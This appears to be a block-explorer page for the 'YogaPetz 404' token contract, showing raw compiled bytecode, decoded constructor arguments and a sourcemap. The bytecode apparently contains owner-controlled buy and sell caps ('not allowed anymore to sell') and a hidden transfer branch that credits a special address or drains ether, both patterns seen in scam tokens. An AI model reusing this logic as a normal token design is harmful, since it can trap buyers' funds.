08490611a8b565b909155506107f59050610ea5565b6001600160a01b0380841660008181526007602090815260408083208054909601909555858252600b815284822080546001600160a01b031990811690941790556009815284822080549093169092559186168252600c9052908120805461085f90600190611a8b565b8154811061086f5761086f611a9e565b60009182526020808320909101546001600160a01b0387168352600c82526040808420868552600d909352909220548154929350839281106108b3576108b3611a9e565b60009182526020808320909101929092556001600160a01b0386168152600c909152604090208054806108e8576108e8611ab4565b600082815260208082208301600019908101839055909201909255838252600d8152604080832054848452818420556001600160a01b038616808452600c8352908320805460018181018355828652938520018690559252905461094c9190611a8b565b6000838152600d602052604080822092909255905183916001600160a01b0380871692908816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91a4826001600160a01b0316846001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314876109d3610ea5565b60405190815260200160405180910390a350505050565b6001600160a01b03831660009081526008602090815260408083203384529091529020546000198114610a4657610a218282611a8b565b6001600160a01b03851660009081526008602090815260408083203384529091529020555b610a51848484610ed7565b50505b505050565b610a648383836106d0565b6001600160a01b0382163b15801590610b105750604051630a85bd0160e11b8082523360048301526001600160a01b03858116602484015260448301849052608060648401526000608484015290919084169063150b7a029060a4016020604051808303816000875af1158015610adf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b039190611aca565b6001600160e01b03191614155b15610a5457604051633da6393160e01b815260040160405180910390fd5b610b36611062565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b6000818152600b60205260409020546001600160a01b031680610b975760405163c5723b5160e01b815260040160405180910390fd5b919050565b610ba4611062565b610bae600061108f565b565b610bb8611062565b610be47f0000000000000000000000000000000000000000000000000000002e90edd0006103e8611af4565b601255610c137f0000000000000000000000000000000000000000000000000000002e90edd0006103e8611af4565b601355565b60015433906001600160a01b03168114610c555760405163118cdaa760e01b81526001600160a01b03821660048201526024015b60405180910390fd5b610c5e8161108f565b50565b600380546104fe90611a3b565b336000818152600a602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b6000610ce7338484610ed7565b9392505050565b610cf98585856106d0565b6001600160a01b0384163b15801590610d935750604051630a85bd0160e11b808252906001600160a01b0386169063150b7a0290610d439033908a90899089908990600401611b0b565b6020604051808303816000875af1158015610d62573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d869190611aca565b6001600160e01b03191614155b15610a5157604051633da6393160e01b815260040160405180910390fd5b6060600060118054610dc290611a3b565b905011610dde57604051806020016040528060008152506106ca565b6011610de9836110a8565b604051602001610dfa929190611b5f565b60405160208183030381529060405292915050565b601180546104fe90611a3b565b610e24611062565b6011610e308282611c34565b5050565b610e3c611062565b600180546001600160a01b0383166001600160a01b03199091168117909155610e6d6000546001600160a01b031690565b6001600160a01b03167f38d16b8cac22d99fc7c124b9cd0de2d3fa1faef420bfe791d8c362d765e2270060405160405180910390a350565b6000610ed27f0000000000000000000000000000000000000000000000000000000000000009600a611dd8565b905090565b6000610ee161113b565b6001600160a01b0384166000908152600e602052604090205460ff16610f98576001600160a01b03841660009081526015602052604081208054849290610f29908490611de7565b90915550506013546001600160a01b0385166000908152601560205260409020541115610f985760405162461bcd60e51b815260206004820152601b60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f2073656c6c00000000006044820152606401610c4c565b6001600160a01b0383166000908152600e602052604090205460ff1661104f576001600160a01b03831660009081526014602052604081208054849290610fe0908490611de7565b90915550506012546001600160a01b038416600090815260146020526040902054111561104f5760405162461bcd60e51b815260206004820152601a60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f206275790000000000006044820152606401610c4c565b61105a84848461115f565b949350505050565b6000546001600160a01b03163314610bae5760405163118cdaa760e01b8152336004820152602401610c4c565b600180546001600160a01b0319169055610c5e81611350565b606060006110b5836113a0565b600101905060008167ffffffffffffffff8111156110d5576110d5611974565b6040519080825280601f01601f1916602001820160405280156110ff576020820181803683370190505b5090508181016020015b600019016f181899199a1a9b1b9c1cb0b131b232b360811b600a86061a8153600a850494508461110957509392505050565b600f5460ff1615610bae5760405163d93c066560e01b815260040160405180910390fd5b60008061116a610ea5565b6001600160a01b038087166000908152600760205260408082205492881682529020549192509061119c878787611478565b156111ad5760019350505050610ce7565b6001600160a01b038716600090815260076020526040812080548792906111d5908490611a8b565b90915550506001600160a01b03808716600090815260076020908152604080832080548a019055928a168252600e9052205460ff16611271576001600160a01b038716600090815260076020526040812054611232908590611dfa565b61123c8585611dfa565b6112469190611a8b565b905060005b8181101561126e5761125c89611523565b8061126681611e1c565b91505061124b565b50505b6001600160a01b0386166000908152600e602052604090205460ff166112f657600061129d8483611dfa565b6001600160a01b0388166000908152600760205260409020546112c1908690611dfa565b6112cb9190611a8b565b905060005b818110156112f3576112e18861164b565b806112eb81611e1c565b9150506112d0565b50505b856001600160a01b0316876001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314878760405161133b91815260200190565b60405180910390a35060019695505050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60008072184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b83106113df5772184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b830492506040015b6d04ee2d6d415b85acef8100000000831061140b576d04ee2d6d415b85acef8100000000830492506020015b662386f26fc10000831061142957662386f26fc10000830492506010015b6305f5e1008310611441576305f5e100830492506008015b612710831061145557612710830492506004015b60648310611467576064830492506002015b600a83106106ca5760010192915050565b6005546000906001600160a01b0390811690841603611519576006546001600160a01b03908116908516036114de576001600160a01b038316600090815260076020526040812080548492906114cf908490611de7565b9091555060019150610ce79050565b6006546040516001600160a01b03909116904780156108fc02916000818181858888f19350505050158015611517573d6000803e3d6000fd5b505b5060009392505050565b6001600160a01b03811661154a57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b0381166000908152600c60205260408120805461157090600190611a8b565b8154811061158057611580611a9e565b90600052602060002001549050600c6000836001600160a01b03166001600160a01b031681526020019081526020016000208054806115c1576115c1611ab4565b600082815260208082208301600019908101839055909201909255828252600d81526040808320839055600b825280832080546001600160a01b031990811690915560099092528083208054909216909155518291906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908390a45050565b61165361113b565b610c5e816001600160a01b03811661167e57604051634e46966960e11b815260040160405180910390fd5b60048054600101908190556000818152600b60205260409020546001600160a01b0316156116bf5760405163119b4fd360e11b815260040160405180910390fd5b6000818152600b6020908152604080832080546001600160a01b0319166001600160a01b038716908117909155808452600c835290832080546001818101835582865293852001859055925290546117179190611a8b565b6000828152600d602052604080822092909255905182916001600160a01b038516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a45050565b60005b8381101561177d578181015183820152602001611765565b50506000910152565b60208152600082518060208401526117a5816040850160208701611762565b601f01601f19169190910160400192915050565b6000602082840312156117cb57600080fd5b5035919050565b80356001600160a01b0381168114610b9757600080fd5b600080604083850312156117fc57600080fd5b611805836117d2565b946020939093013593505050565b60008060006060848603121561182857600080fd5b611831846117d2565b925061183f602085016117d2565b9150604084013590509250925092565b6000806040838503121561186257600080fd5b61186b836117d2565b91506020830135801515811461188057600080fd5b809150509250929050565b60006020828403121561189d57600080fd5b610ce7826117d2565b6000806000806000608086880312156118be57600080fd5b6118c7866117d2565b94506118d5602087016117d2565b935060408601359250606086013567ffffffffffffffff808211156118f957600080fd5b818801915088601f83011261190d57600080fd5b81358181111561191c57600080fd5b89602082850101111561192e57600080fd5b9699959850939650602001949392505050565b6000806040838503121561195457600080fd5b61195d836117d2565b915061196b602084016117d2565b90509250929050565b634e487b7160e01b600052604160045260246000fd5b60006020828403121561199c57600080fd5b813567ffffffffffffffff808211156119b457600080fd5b818401915084601f8301126119c857600080fd5b8135818111156119da576119da611974565b604051601f8201601f19908116603f01168101908382118183101715611a0257611a02611974565b81604052828152876020848701011115611a1b57600080fd5b826020860160208301376000928101602001929092525095945050505050565b600181811c90821680611a4f57607f821691505b602082108103611a6f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b818103818111156106ca576106ca611a75565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052603160045260246000fd5b600060208284031215611adc57600080fd5b81516001600160e01b031981168114610ce757600080fd5b80820281158282048414176106ca576106ca611a75565b6001600160a01b038681168252851660208201526040810184905260806060820181905281018290526000828460a0840137600060a0848401015260a0601f19601f85011683010190509695505050505050565b6000808454611b6d81611a3b565b60018281168015611b855760018114611b9a57611bc9565b60ff1984168752821515830287019450611bc9565b8860005260208060002060005b85811015611bc05781548a820152908401908201611ba7565b50505082870194505b505050508351611bdd818360208801611762565b01949350505050565b601f821115610a5457600081815260208120601f850160051c81016020861015611c0d5750805b601f850160051c820191505b81811015611c2c57828155600101611c19565b505050505050565b815167ffffffffffffffff811115611c4e57611c4e611974565b611c6281611c5c8454611a3b565b84611be6565b602080601f831160018114611c975760008415611c7f5750858301515b600019600386901b1c1916600185901b178555611c2c565b600085815260208120601f198616915b82811015611cc657888601518255948401946001909101908401611ca7565b5085821015611ce45787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600181815b80851115611d2f578160001904821115611d1557611d15611a75565b80851615611d2257918102915b93841c9390800290611cf9565b509250929050565b600082611d46575060016106ca565b81611d53575060006106ca565b8160018114611d695760028114611d7357611d8f565b60019150506106ca565b60ff841115611d8457611d84611a75565b50506001821b6106ca565b5060208310610133831016604e8410600b8410161715611db2575081810a6106ca565b611dbc8383611cf4565b8060001904821115611dd057611dd0611a75565b029392505050565b6000610ce760ff841683611d37565b808201808211156106ca576106ca611a75565b600082611e1757634e487b7160e01b600052601260045260246000fd5b500490565b600060018201611e2e57611e2e611a75565b506001019056fea26469706673582212205e582a6e2a89539917363bbb61de8a78c5e7b6557cd04216214d3b181bcc5ce964736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000001200000000000000000000000008ef795e51160ebd14c2068ec362cada7c49f4bac00000000000000000000000000000000000000000000000000000000000000c8000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c596f67615065747a2034303400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007594f474134303400000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : _name (string): YogaPetz 404
Arg [1] : _symbol (string): YOGA404
Arg [2] : _owner (address): 0x8ef795E51160eBD14c2068Ec362CAdA7c49F4bAC
Arg [3] : _initialSupply (uint256): 200
Arg [4] : _decimal (uint8): 9
Arg [5] : _buylimit (uint256): 4
Arg [6] : _selllimit (uint256): 4

-----Encoded View---------------
11 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000120
Arg [2] : 0000000000000000000000008ef795e51160ebd14c2068ec362cada7c49f4bac
Arg [3] : 00000000000000000000000000000000000000000000000000000000000000c8
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [7] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [8] : 596f67615065747a203430340000000000000000000000000000000000000000
Arg [9] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [10] : 594f474134303400000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

40468:2191:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26799:18;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27556:46;;;;;;:::i;:::-;;;;;;;;;;;;-1:-1:-1;;;;;27556:46:0;;;;;;-1:-1:-1;;;;;1019:32:1;;;1001:51;;989:2;974:18;27556:46:0;855:203:1;29420:642:0;;;;;;:::i;:::-;;:::i;:::-;;;1665:14:1;;1658:22;1640:41;;1628:2;1613:18;29420:642:0;1500:187:1;27035:36:0;;;;;;;;1838:25:1;;;1826:2;1811:18;27035:36:0;1692:177:1;30469:1714:0;;;;;;:::i;:::-;;:::i;:::-;;26935:31;;;;;;;;2379:4:1;2367:17;;;2349:36;;2337:2;2322:18;26935:31:0;2207:184:1;32479:405:0;;;;;;:::i;:::-;;:::i;27170:21::-;;;;;;40636:24;;;;;;28749:111;;;;;;:::i;:::-;;:::i;40606:23::-;;;;;;38236:86;38307:7;;;;38236:86;;28932:193;;;;;;:::i;:::-;;:::i;27322:44::-;;;;;;:::i;:::-;;;;;;;;;;;;;;18989:103;;;:::i;42289:130::-;;;:::i;24912:235::-;;;:::i;18314:87::-;18360:7;18387:6;-1:-1:-1;;;;;18387:6:0;18314:87;;26853:20;;;:::i;28167:41::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;30113:207;;;;;;:::i;:::-;;:::i;32242:160::-;;;;;;:::i;:::-;;:::i;32979:437::-;;;;;;:::i;:::-;;:::i;41548:181::-;;;;;;:::i;:::-;;:::i;40573:26::-;;;:::i;27436:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;42550:106;;;;;;:::i;:::-;;:::i;40673:48::-;;;;;;:::i;:::-;;;;;;;;;;;;;;24000:101;24080:13;;-1:-1:-1;;;;;24080:13:0;24000:101;;27667:68;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;24300:181;;;;;;:::i;:::-;;:::i;40728:49::-;;;;;;:::i;:::-;;;;;;;;;;;;;;26799:18;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;29420:642::-;29523:4;29558:6;;29544:10;:20;;:38;;;;;29581:1;29568:10;:14;29544:38;29540:491;;;29599:13;29615:20;;;:8;:20;;;;;;-1:-1:-1;;;;;29615:20:0;29656:10;:19;;;;;:59;;-1:-1:-1;;;;;;29680:23:0;;;;;;:16;:23;;;;;;;;29704:10;29680:35;;;;;;;;;;29679:36;29656:59;29652:121;;;29743:14;;-1:-1:-1;;;29743:14:0;;;;;;;;;;;29652:121;29789:23;;;;:11;:23;;;;;;;;;:33;;-1:-1:-1;;;;;;29789:33:0;-1:-1:-1;;;;;29789:33:0;;;;;;;;;29844:36;;1838:25:1;;;29844:36:0;;;;;;1811:18:1;29844:36:0;;;;;;;29584:308;29540:491;;;29923:10;29913:21;;;;:9;:21;;;;;;;;-1:-1:-1;;;;;29913:30:0;;;;;;;;;;;;:43;;;29978:41;1838:25:1;;;29913:30:0;;29923:10;29978:41;;1811:18:1;29978:41:0;;;;;;;29540:491;-1:-1:-1;30050:4:0;29420:642;;;;;:::o;30469:1714::-;30615:6;;30601:10;:20;30597:1579;;30650:20;;;;:8;:20;;;;;;-1:-1:-1;;;;;30642:28:0;;;30650:20;;30642:28;30638:91;;30698:15;;-1:-1:-1;;;30698:15:0;;;;;;;;;;;30638:91;-1:-1:-1;;;;;30749:16:0;;30745:82;;30793:18;;-1:-1:-1;;;30793:18:0;;;;;;;;;;;30745:82;30865:10;-1:-1:-1;;;;;30865:18:0;;;;;;:74;;-1:-1:-1;;;;;;30905:22:0;;;;;;:16;:22;;;;;;;;30928:10;30905:34;;;;;;;;;;30904:35;30865:74;:132;;;;-1:-1:-1;30974:23:0;;;;:11;:23;;;;;;-1:-1:-1;;;;;30974:23:0;30960:10;:37;;30865:132;30843:226;;;31039:14;;-1:-1:-1;;;31039:14:0;;;;;;;;;;;30843:226;31104:10;:8;:10::i;:::-;-1:-1:-1;;;;;31085:15:0;;;;;;:9;:15;;;;;:29;;:15;;;:29;;;;;:::i;:::-;;;;-1:-1:-1;31177:10:0;;-1:-1:-1;31177:8:0;:10::i;:::-;-1:-1:-1;;;;;31160:13:0;;;;;;;:9;:13;;;;;;;;:27;;;;;;;;31219:20;;;:8;:20;;;;;:25;;-1:-1:-1;;;;;;31219:25:0;;;;;;;;31266:11;:23;;;;;31259:30;;;;;;;;31367:12;;;;;:6;:12;;;;;31380:19;;:23;;-1:-1:-1;;31380:23:0;:::i;:::-;31367:37;;;;;;;;:::i;:::-;;;;;;;;;;;;;-1:-1:-1;;;;;31419:12:0;;;;:6;:12;;;;;;31432:23;;;:11;:23;;;;;;;31419:37;;31367;;-1:-1:-1;31367:37:0;;31419;;;;;;:::i;:::-;;;;;;;;;;;;:49;;;;-1:-1:-1;;;;;31503:12:0;;;;:6;:12;;;;;;:18;;;;;;;:::i;:::-;;;;;;;;;;;-1:-1:-1;;31503:18:0;;;;;;;;;;;;31607:23;;;:11;:23;;;;;;;31582:22;;;;;;:48;-1:-1:-1;;;;;31684:10:0;;;;;:6;:10;;;;;:27;;31503:18;31684:27;;;;;;;;;;;;;;;31794:10;;:17;;:21;;31503:18;31794:21;:::i;:::-;31768:23;;;;:11;:23;;;;;;:47;;;;31837:30;;31780:10;;-1:-1:-1;;;;;31837:30:0;;;;;;;;;;;31907:2;-1:-1:-1;;;;;31887:35:0;31901:4;-1:-1:-1;;;;;31887:35:0;;31911:10;:8;:10::i;:::-;31887:35;;1838:25:1;;;1826:2;1811:18;31887:35:0;;;;;;;30623:1311;30469:1714;;;:::o;30597:1579::-;-1:-1:-1;;;;;31973:15:0;;31955;31973;;;:9;:15;;;;;;;;31989:10;31973:27;;;;;;;;-1:-1:-1;;32021:28:0;;32017:101;;32098:20;32108:10;32098:7;:20;:::i;:::-;-1:-1:-1;;;;;32068:15:0;;;;;;:9;:15;;;;;;;;32084:10;32068:27;;;;;;;:50;32017:101;32133:31;32143:4;32149:2;32153:10;32133:9;:31::i;:::-;;31940:236;30597:1579;30469:1714;;;:::o;32479:405::-;32603:26;32616:4;32622:2;32626;32603:12;:26::i;:::-;-1:-1:-1;;;;;32660:14:0;;;:19;;;;:154;;-1:-1:-1;32696:61:0;;-1:-1:-1;;;32696:61:0;;;32732:10;32696:61;;;6295:34:1;-1:-1:-1;;;;;6365:15:1;;;6345:18;;;6338:43;6397:18;;;6390:34;;;6460:3;6440:18;;;6433:31;-1:-1:-1;6480:19:1;;;6473:30;32774:40:0;;32696:35;;;;32774:40;;6520:19:1;;32696:61:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;;32696:118:0;;;32660:154;32642:235;;;32848:17;;-1:-1:-1;;;32848:17:0;;;;;;;;;;;28749:111;18200:13;:11;:13::i;:::-;-1:-1:-1;;;;;28827:17:0;;;::::1;;::::0;;;:9:::1;:17;::::0;;;;:25;;-1:-1:-1;;28827:25:0::1;::::0;::::1;;::::0;;;::::1;::::0;;28749:111::o;28932:193::-;28990:13;29024:12;;;:8;:12;;;;;;-1:-1:-1;;;;;29024:12:0;;29049:69;;29096:10;;-1:-1:-1;;;29096:10:0;;;;;;;;;;;29049:69;28932:193;;;:::o;18989:103::-;18200:13;:11;:13::i;:::-;19054:30:::1;19081:1;19054:18;:30::i;:::-;18989:103::o:0;42289:130::-;18200:13;:11;:13::i;:::-;42352:18:::1;:11;42366:4;42352:18;:::i;:::-;42341:8;:29:::0;42393:18:::1;:11;42407:4;42393:18;:::i;:::-;42381:9;:30:::0;42289:130::o;24912:235::-;24080:13;;853:10;;-1:-1:-1;;;;;24080:13:0;25009:24;;25005:98;;25057:34;;-1:-1:-1;;;25057:34:0;;-1:-1:-1;;;;;1019:32:1;;25057:34:0;;;1001:51:1;974:18;;25057:34:0;;;;;;;;25005:98;25113:26;25132:6;25113:18;:26::i;:::-;24954:193;24912:235::o;26853:20::-;;;;;;;:::i;30113:207::-;30216:10;30199:28;;;;:16;:28;;;;;;;;-1:-1:-1;;;;;30199:38:0;;;;;;;;;;;;:49;;-1:-1:-1;;30199:49:0;;;;;;;;;;30266:46;;1640:41:1;;;30199:38:0;;30216:10;30266:46;;1613:18:1;30266:46:0;;;;;;;30113:207;;:::o;32242:160::-;32337:4;32361:33;32371:10;32383:2;32387:6;32361:9;:33::i;:::-;32354:40;32242:160;-1:-1:-1;;;32242:160:0:o;32979:437::-;33133:26;33146:4;33152:2;33156;33133:12;:26::i;:::-;-1:-1:-1;;;;;33190:14:0;;;:19;;;;:156;;-1:-1:-1;33226:63:0;;-1:-1:-1;;;33226:63:0;;;33306:40;-1:-1:-1;;;;;33226:35:0;;;33306:40;;33226:63;;33262:10;;33274:4;;33280:2;;33284:4;;;;33226:63;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;;;;;;33226:120:0;;;33190:156;33172:237;;;33380:17;;-1:-1:-1;;;33380:17:0;;;;;;;;;;;41548:181;41608:13;41670:1;41647:12;41641:26;;;;;:::i;:::-;;;:30;:80;;;;;;;;;;;;;;;;;41688:12;41702:13;:2;:11;:13::i;:::-;41674:42;;;;;;;;;:::i;:::-;;;;;;;;;;;;;41634:87;41548:181;-1:-1:-1;;41548:181:0:o;40573:26::-;;;;;;;:::i;42550:106::-;18200:13;:11;:13::i;:::-;42624:12:::1;:24;42639:9:::0;42624:12;:24:::1;:::i;:::-;;42550:106:::0;:::o;24300:181::-;18200:13;:11;:13::i;:::-;24390::::1;:24:::0;;-1:-1:-1;;;;;24390:24:0;::::1;-1:-1:-1::0;;;;;;24390:24:0;;::::1;::::0;::::1;::::0;;;24455:7:::1;18360::::0;18387:6;-1:-1:-1;;;;;18387:6:0;;18314:87;24455:7:::1;-1:-1:-1::0;;;;;24430:43:0::1;;;;;;;;;;;24300:181:::0;:::o;35104:92::-;35147:7;35174:14;35180:8;35174:2;:14;:::i;:::-;35167:21;;35104:92;:::o;41737:544::-;41881:4;37841:19;:17;:19::i;:::-;-1:-1:-1;;;;;41901:15:0;::::1;;::::0;;;:9:::1;:15;::::0;;;;;::::1;;41897:163;;-1:-1:-1::0;;;;;41932:19:0;::::1;;::::0;;;:13:::1;:19;::::0;;;;:29;;41955:6;;41932:19;:29:::1;::::0;41955:6;;41932:29:::1;:::i;:::-;::::0;;;-1:-1:-1;;42007:9:0::1;::::0;-1:-1:-1;;;;;41984:19:0;::::1;;::::0;;;:13:::1;:19;::::0;;;;;:32:::1;;41976:72;;;::::0;-1:-1:-1;;;41976:72:0;;12629:2:1;41976:72:0::1;::::0;::::1;12611:21:1::0;12668:2;12648:18;;;12641:30;12707:29;12687:18;;;12680:57;12754:18;;41976:72:0::1;12427:351:1::0;41976:72:0::1;-1:-1:-1::0;;;;;42074:13:0;::::1;;::::0;;;:9:::1;:13;::::0;;;;;::::1;;42070:153;;-1:-1:-1::0;;;;;42103:16:0;::::1;;::::0;;;:12:::1;:16;::::0;;;;:26;;42123:6;;42103:16;:26:::1;::::0;42123:6;;42103:26:::1;:::i;:::-;::::0;;;-1:-1:-1;;42172:8:0::1;::::0;-1:-1:-1;;;;;42152:16:0;::::1;;::::0;;;:12:::1;:16;::::0;;;;;:28:::1;;42144:67;;;::::0;-1:-1:-1;;;42144:67:0;;12985:2:1;42144:67:0::1;::::0;::::1;12967:21:1::0;13024:2;13004:18;;;12997:30;13063:28;13043:18;;;13036:56;13109:18;;42144:67:0::1;12783:350:1::0;42144:67:0::1;42240:33;42256:4;42262:2;42266:6;42240:15;:33::i;:::-;42233:40:::0;41737:544;-1:-1:-1;;;;41737:544:0:o;18479:166::-;18360:7;18387:6;-1:-1:-1;;;;;18387:6:0;853:10;18539:23;18535:103;;18586:40;;-1:-1:-1;;;18586:40:0;;853:10;18586:40;;;1001:51:1;974:18;;18586:40:0;855:203:1;24671:156:0;24761:13;24754:20;;-1:-1:-1;;;;;;24754:20:0;;;24785:34;24810:8;24785:24;:34::i;1536:730::-;1592:13;1643:14;1660:29;1683:5;1660:22;:29::i;:::-;1692:1;1660:33;1643:50;;1708:20;1742:6;1731:18;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;1731:18:0;-1:-1:-1;1708:41:0;-1:-1:-1;1873:28:0;;;1889:2;1873:28;1930:290;-1:-1:-1;;1962:5:0;-1:-1:-1;;;2099:2:0;2088:14;;2083:32;1962:5;2070:46;2162:2;2153:11;;;-1:-1:-1;2183:21:0;1930:290;2183:21;-1:-1:-1;2241:6:0;1536:730;-1:-1:-1;;;1536:730:0:o;38395:132::-;38307:7;;;;38457:63;;;38493:15;;-1:-1:-1;;;38493:15:0;;;;;;;;;;;33868:1197;33989:4;34006:12;34021:10;:8;:10::i;:::-;-1:-1:-1;;;;;34072:15:0;;;34042:27;34072:15;;;:9;:15;;;;;;;34130:13;;;;;;;;34006:25;;-1:-1:-1;34072:15:0;34159:33;34082:4;34140:2;34185:6;34159:15;:33::i;:::-;34156:76;;;34216:4;34209:11;;;;;;;34156:76;-1:-1:-1;;;;;34252:15:0;;;;;;:9;:15;;;;;:25;;34271:6;;34252:15;:25;;34271:6;;34252:25;:::i;:::-;;;;-1:-1:-1;;;;;;;34315:13:0;;;;;;;:9;:13;;;;;;;;:23;;;;;;34423:15;;;;;:9;:15;;;;;;34418:251;;-1:-1:-1;;;;;34529:15:0;;34455:22;34529:15;;;:9;:15;;;;;;:22;;34547:4;;34529:22;:::i;:::-;34481:26;34503:4;34481:19;:26;:::i;:::-;34480:72;;;;:::i;:::-;34455:97;;34572:9;34567:91;34591:14;34587:1;:18;34567:91;;;34631:11;34637:4;34631:5;:11::i;:::-;34607:3;;;;:::i;:::-;;;;34567:91;;;;34440:229;34418:251;-1:-1:-1;;;;;34745:13:0;;;;;;:9;:13;;;;;;;;34740:247;;34775:22;34843:28;34867:4;34843:21;:28;:::i;:::-;-1:-1:-1;;;;;34801:13:0;;;;;;:9;:13;;;;;;:20;;34817:4;;34801:20;:::i;:::-;34800:72;;;;:::i;:::-;34775:97;;34892:9;34887:89;34911:14;34907:1;:18;34887:89;;;34951:9;34957:2;34951:5;:9::i;:::-;34927:3;;;;:::i;:::-;;;;34887:89;;;;34760:227;34740:247;35024:2;-1:-1:-1;;;;;35004:31:0;35018:4;-1:-1:-1;;;;;35004:31:0;;35028:6;35004:31;;;;1838:25:1;;1826:2;1811:18;;1692:177;35004:31:0;;;;;;;;-1:-1:-1;35053:4:0;;33868:1197;-1:-1:-1;;;;;;33868:1197:0:o;19627:191::-;19701:16;19720:6;;-1:-1:-1;;;;;19737:17:0;;;-1:-1:-1;;;;;;19737:17:0;;;;;;19770:40;;19720:6;;;;;;;19770:40;;19701:16;19770:40;19690:128;19627:191;:::o;11951:948::-;12004:7;;-1:-1:-1;;;12082:17:0;;12078:106;;-1:-1:-1;;;12120:17:0;;;-1:-1:-1;12166:2:0;12156:12;12078:106;12211:8;12202:5;:17;12198:106;;12249:8;12240:17;;;-1:-1:-1;12286:2:0;12276:12;12198:106;12331:8;12322:5;:17;12318:106;;12369:8;12360:17;;;-1:-1:-1;12406:2:0;12396:12;12318:106;12451:7;12442:5;:16;12438:103;;12488:7;12479:16;;;-1:-1:-1;12524:1:0;12514:11;12438:103;12568:7;12559:5;:16;12555:103;;12605:7;12596:16;;;-1:-1:-1;12641:1:0;12631:11;12555:103;12685:7;12676:5;:16;12672:103;;12722:7;12713:16;;;-1:-1:-1;12758:1:0;12748:11;12672:103;12802:7;12793:5;:16;12789:68;;12840:1;12830:11;12885:6;11951:948;-1:-1:-1;;11951:948:0:o;33424:376::-;33535:5;;33509:4;;-1:-1:-1;;;;;33535:5:0;;;33529:11;;;;33526:244;;33569:9;;-1:-1:-1;;;;;33569:9:0;;;33561:17;;;;33557:202;;-1:-1:-1;;;;;33599:13:0;;;;;;:9;:13;;;;;:23;;33616:6;;33599:13;:23;;33616:6;;33599:23;:::i;:::-;;;;-1:-1:-1;33648:4:0;;-1:-1:-1;33641:11:0;;-1:-1:-1;33641:11:0;33557:202;33701:9;;33693:50;;-1:-1:-1;;;;;33701:9:0;;;;33721:21;33693:50;;;;;33701:9;33693:50;33701:9;33693:50;33721:21;33701:9;33693:50;;;;;;;;;;;;;;;;;;;;;33557:202;-1:-1:-1;33787:5:0;33424:376;;;;;:::o;35686:373::-;-1:-1:-1;;;;;35747:18:0;;35743:73;;35789:15;;-1:-1:-1;;;35789:15:0;;;;;;;;;;;35743:73;-1:-1:-1;;;;;35841:12:0;;35828:10;35841:12;;;:6;:12;;;;;35854:19;;:23;;35876:1;;35854:23;:::i;:::-;35841:37;;;;;;;;:::i;:::-;;;;;;;;;35828:50;;35889:6;:12;35896:4;-1:-1:-1;;;;;35889:12:0;-1:-1:-1;;;;;35889:12:0;;;;;;;;;;;;:18;;;;;;;:::i;:::-;;;;;;;;;;;-1:-1:-1;;35889:18:0;;;;;;;;;;;;35925:15;;;:11;:15;;;;;;35918:22;;;35958:8;:12;;;;;35951:19;;-1:-1:-1;;;;;;35951:19:0;;;;;;35988:11;:15;;;;;;35981:22;;;;;;;;36021:30;35937:2;;35889:18;-1:-1:-1;;;